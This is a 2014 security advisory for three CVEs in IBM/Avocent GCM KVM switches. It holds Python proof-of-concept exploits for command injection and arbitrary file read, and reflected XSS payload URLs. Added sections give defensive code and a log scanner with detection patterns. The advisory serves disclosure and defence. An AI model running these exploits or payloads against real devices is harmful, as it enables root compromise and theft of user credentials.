*Product description*

The IBM 1754 GCM family provides KVM over IP and serial console management technology in a single appliance. Versions v1.20.0.22575 and prior are vulnerable. Note that these vulnerabilities are also present in some Dell units and probably in other vendors' versions of this rebranded KVM. I contacted Dell but no response has been received.
*1. Remote code execution*

CVEID: CVE-2014-2085
Description: Improperly sanitized input may allow a remote authenticated attacker to perform remote code execution on the GCM KVM switch.

PoC of this vulnerability:

#!/usr/bin/python
"""
Exploit for Avocent KVM switch v1.20.0.22575.
Remote code execution with privilege elevation.
SessionId (avctSessionId) is necessary for this to work, so you need a
valid user. Default user is "Admin" with blank password.
After running exploit, connect using telnet to device with user target
(pass: target) then do "/tmp/su -" to gain root (password "root")
alex.a.bravo@gmail.com
"""
from StringIO import StringIO
import pycurl
import os

sessid = "1111111111"
target = "192.168.0.10"
# The beginning of this line is missing from the source; only the tail of the
# injected command string survives, and "..." marks the gap.
durl = "...sbin/telnetd%20;%20cp%20/bin/busybox%20/tmp/su%20;%20chmod%206755%20/tmp/su%20;"

storage = StringIO()
c = pycurl.Curl()
c.setopt(c.URL, durl)
c.setopt(c.SSL_VERIFYPEER, 0)
c.setopt(c.SSL_VERIFYHOST, 0)
c.setopt(c.WRITEFUNCTION, storage.write)
# The request is authenticated only by the avctSessionId cookie.
c.setopt(c.COOKIE, 'avctSessionId=' + sessid)
try:
    print "[*] Sending GET to " + target + " with session id " + sessid + "..."
    c.perform()
    c.close()
except:
    print ""
finally:
    print "[*] Done"

print "[*] Trying telnet..."
print "[*] Login as target/target, then do /tmp/su - and enter password \"root\""
os.system("telnet " + target)
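The PoC above works because the value it submits is spliced into a shell command string on the device, where the encoded `%20;%20` (space, semicolon, space) terminates the intended command and starts the attacker's own. What follows is an added example, not code from this advisory or from the IBM/Avocent firmware, that reproduces that failure mode with a harmless `echo` standing in for the device's real tool and shows the two fixes a developer would apply: hand the value to the program as an argv element so no shell ever parses it, and validate it against an allowlist first. The hostname pattern `HOST_RE` is an assumed policy.

```python
#!/usr/bin/env python3
"""Command injection: a shell-string invocation beside its hardened forms.

Added example. `echo` stands in for whatever tool the appliance wraps
(assumption); the value passed in plays the role of the user-controlled
request parameter.
"""
import re
import subprocess

# Assumed policy: the parameter is supposed to be a hostname-like token.
# The first character may not be '-' so the value cannot become an option.
HOST_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9.\-]{0,62}")


def vulnerable_run(value: str) -> str:
    """String concatenation plus shell=True: ';' ends the intended command
    and whatever follows runs as a second command."""
    proc = subprocess.run("echo " + value, shell=True,
                          capture_output=True, text=True)
    return proc.stdout


def argv_run(value: str) -> str:
    """No shell involved: the value reaches the tool as a single argument,
    so ';', '|', backticks and '$(...)' are inert characters."""
    proc = subprocess.run(["echo", value], capture_output=True, text=True)
    return proc.stdout


def hardened_run(value: str) -> str:
    """Allowlist validation first, argv invocation second. Rejecting early
    also keeps junk out of logs and out of any later string-building code."""
    if not HOST_RE.fullmatch(value):
        raise ValueError("rejected value: %r" % value)
    return argv_run(value)


if __name__ == "__main__":
    # Constructed benign payload: a second command that only echoes a marker.
    payload = "host-01; echo INJECTED"
    print("shell string :", repr(vulnerable_run(payload)))
    print("argv         :", repr(argv_run(payload)))
    try:
        hardened_run(payload)
    except ValueError as exc:
        print("hardened     :", exc)
```

Run stand-alone, the shell-string variant prints two lines (the marker was executed), the argv variant prints the whole payload back as one literal string, and the hardened variant refuses it before anything is spawned.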
*2. Arbitrary file read*

CVEID: CVE-2014-3081
Description: This device allows any authenticated user to read arbitrary files. Files can be anywhere on the target.

PoC of this vulnerability:

#!/usr/bin/python
"""
This exploit for Avocent KVM switch v1.20.0.22575 allows an attacker to
read arbitrary files on device.
SessionId (avctSessionId) is necessary for this to work, so you need a
valid user.
alex.a.bravo@gmail.com
"""
from StringIO import StringIO
import pycurl

sessid = "1111111111"
target = "192.168.0.10"
file = "/etc/IBM_user.dat"
# The beginning of this line is missing from the source; only the tail of the
# URL survives, and "..." marks the gap.
durl = "...bits&display=results&filename=" + file

storage = StringIO()
c = pycurl.Curl()
c.setopt(c.URL, durl)
c.setopt(c.SSL_VERIFYPEER, 0)
c.setopt(c.SSL_VERIFYHOST, 0)
c.setopt(c.WRITEFUNCTION, storage.write)
c.setopt(c.COOKIE, 'avctSessionId=' + sessid)
try:
    c.perform()
    c.close()
except:
    print ""

# The file contents come back wrapped in HTML table cells; strip the tags.
content = storage.getvalue()
print content.replace("<td>", "\n").replace("</td>", "\n")
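The file-read PoC passes an absolute path in `filename` and the device opens exactly what it was given. The following is an added example (not the advisory's or the vendor's code) of how a download endpoint confines such a parameter to one export directory: resolve the joined path with `realpath`, then require the result to stay under the base directory. The export directory, its `session.log`, the symlink that points outside it and the file outside it are constructed fixtures; `vulnerable_read` shows the unconfined behaviour for comparison.

```python
#!/usr/bin/env python3
"""Confining a 'download this file' parameter to a single directory.

Added example, not the appliance's code. The parameter name `filename`
comes from the advisory's PoC; everything else is constructed.
"""
import os
import tempfile


def vulnerable_read(base_dir: str, filename: str) -> bytes:
    """os.path.join discards base_dir when filename is absolute, and '..'
    segments are honoured, so any readable file on the system is served."""
    with open(os.path.join(base_dir, filename), "rb") as fh:
        return fh.read()


def is_confined(base_dir: str, filename: str) -> bool:
    """True only if the fully resolved path stays inside base_dir.

    realpath collapses '..' and follows symlinks, so a link inside the export
    directory that points elsewhere is caught too; commonpath (rather than a
    string prefix test) stops '/export' from accepting '/export2/x'.
    """
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, filename))
    return os.path.commonpath([base, target]) == base


def safe_read(base_dir: str, filename: str) -> bytes:
    """Hardened form: refuse anything that escapes the export directory."""
    if not is_confined(base_dir, filename):
        raise PermissionError("path escapes export directory: %r" % filename)
    target = os.path.realpath(os.path.join(os.path.realpath(base_dir), filename))
    with open(target, "rb") as fh:
        return fh.read()


def make_demo_dir():
    """Constructed fixture: an export directory holding one log, a symlink
    named 'link' that points at /etc, plus one file outside the directory.
    Returns (export_dir, path_of_outside_file)."""
    base = tempfile.mkdtemp(prefix="kvm-export-")
    with open(os.path.join(base, "session.log"), "wb") as fh:
        fh.write(b"constructed session log\n")
    os.symlink("/etc", os.path.join(base, "link"))
    fd, outside = tempfile.mkstemp(prefix="kvm-outside-")
    with os.fdopen(fd, "wb") as fh:
        fh.write(b"outside the export directory\n")
    return base, outside


if __name__ == "__main__":
    base, outside = make_demo_dir()
    print("vulnerable_read(outside):", vulnerable_read(base, outside))
    for name in ("session.log", outside, "../../etc/passwd", "link/hostname"):
        print("%-20s confined=%s" % (name, is_confined(base, name)))
```

Note that the check is done on the resolved path, not on the string the client sent: rejecting `..` or a leading `/` by pattern alone would still let a symlink or an encoded variant through.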
*3. Cross site scripting non-persistent*

CVEID: CVE-2014-3080
Description: System is vulnerable to cross-site scripting, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.

Examples:
http://kvm/kvm.cgi?%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E
https://kvm/avctalert.php?arg1=dadadasdasd&arg2=dasdasdas&key=%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E
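Spotting these requests in a proxy log or a syslog-forwarded web log is straightforward once the query string is percent-decoded. The following is an added example, not part of the advisory, that scans constructed combined-format log lines for all three issues in this report: the two XSS URLs above (copied verbatim), a `filename=` value that is an absolute path (CVE-2014-3081), and a query carrying shell separators like the RCE PoC's `%20;%20` chain (CVE-2014-2085). Because the advisory truncates the real endpoint and parameter names for the last two, the sample uses `/PLACEHOLDER.cgi` and `PARAM` for them; the extra `file`/`path` parameter names and the regular expressions are assumptions.

```python
#!/usr/bin/env python3
"""Flag requests matching the three advisory issues in web-server-style logs.

Added example. SAMPLE_LOG is constructed, not output from the appliance;
endpoints the advisory truncates appear as /PLACEHOLDER.cgi and PARAM.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed combined-format lines. Lines 1-2 carry the advisory's XSS URLs
# verbatim; line 3 is the file-read request; line 4 is the RCE command chain
# from the PoC; line 5 is a benign request.
SAMPLE_LOG = """\
10.0.0.5 - - [17/Jul/2014:10:01:02 +0000] "GET /kvm/kvm.cgi?%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E HTTP/1.1" 200 512
10.0.0.5 - - [17/Jul/2014:10:01:09 +0000] "GET /avctalert.php?arg1=dadadasdasd&arg2=dasdasdas&key=%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E HTTP/1.1" 200 341
10.0.0.7 - - [17/Jul/2014:10:02:30 +0000] "GET /PLACEHOLDER.cgi?display=results&filename=/etc/IBM_user.dat HTTP/1.1" 200 1024
10.0.0.7 - - [17/Jul/2014:10:03:11 +0000] "GET /PLACEHOLDER.cgi?PARAM=x%20;%20cp%20/bin/busybox%20/tmp/su%20;%20chmod%206755%20/tmp/su%20; HTTP/1.1" 200 20
10.0.0.9 - - [17/Jul/2014:10:04:00 +0000] "GET /kvm/kvm.cgi?view=status HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# CVE-2014-3080: a script tag, a javascript: URL or an inline event handler,
# matched after percent-decoding.
XSS_RE = re.compile(r"<\s*script\b|javascript:|\bon[a-z]+\s*=", re.I)
# CVE-2014-2085: shell command separators and substitution. ';' can occur in
# legitimate URLs, so treat a hit as a lead, not a verdict.
SHELL_RE = re.compile(r"[;|`]|\$\(|&&")
# CVE-2014-3081: parameters that name a file. "filename" is from the PoC;
# "file" and "path" are assumptions.
FILE_PARAMS = {"filename", "file", "path"}


def decode(s: str) -> str:
    """Decode twice so a double-encoded payload (%253C...) is seen as well."""
    return unquote(unquote(s))


def classify(url: str) -> list:
    """Return the list of issue labels a request URL matches (empty if none)."""
    parts = urlsplit(url)
    found = []
    if XSS_RE.search(decode(parts.path + "?" + parts.query)):
        found.append("xss")
    if SHELL_RE.search(decode(parts.query)):
        found.append("command-injection")
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if key.lower() in FILE_PARAMS and (value.startswith("/") or ".." in value):
            found.append("file-read")
            break
    return found


def scan(log_text: str) -> list:
    """Parse each log line and report those that match at least one issue."""
    hits = []
    for number, line in enumerate(log_text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = classify(m.group("url"))
        if findings:
            hits.append({"line": number, "ip": m.group("ip"),
                         "url": m.group("url"), "findings": findings})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("line %d %s %s -> %s" % (hit["line"], hit["ip"],
                                        hit["url"], ", ".join(hit["findings"])))
```

Against the sample, lines 1 and 2 are reported as `xss`, line 3 as `file-read`, line 4 as `command-injection`, and the status request on line 5 is not reported. Because the device authenticates these requests with the `avctSessionId` cookie, a hit from an address that does not normally hold a session is the detail worth correlating.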
*Vendor Response:*

IBM released firmware 1.20.20.23447.

*Timeline:*

2014-05-20 - Vendor (PSIRT) notified
2014-05-21 - Vendor assigns internal ID
2014-07-16 - Patch disclosed
2014-07-17 - Vulnerability disclosed

*External Information:*

Info about the vulnerability (Spanish):
http://www.bitcloud.es/2014/07/tres-nuevas-vulnerabilidades-en-ibm-gcm.html

IBM Security Bulletin:
http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5095983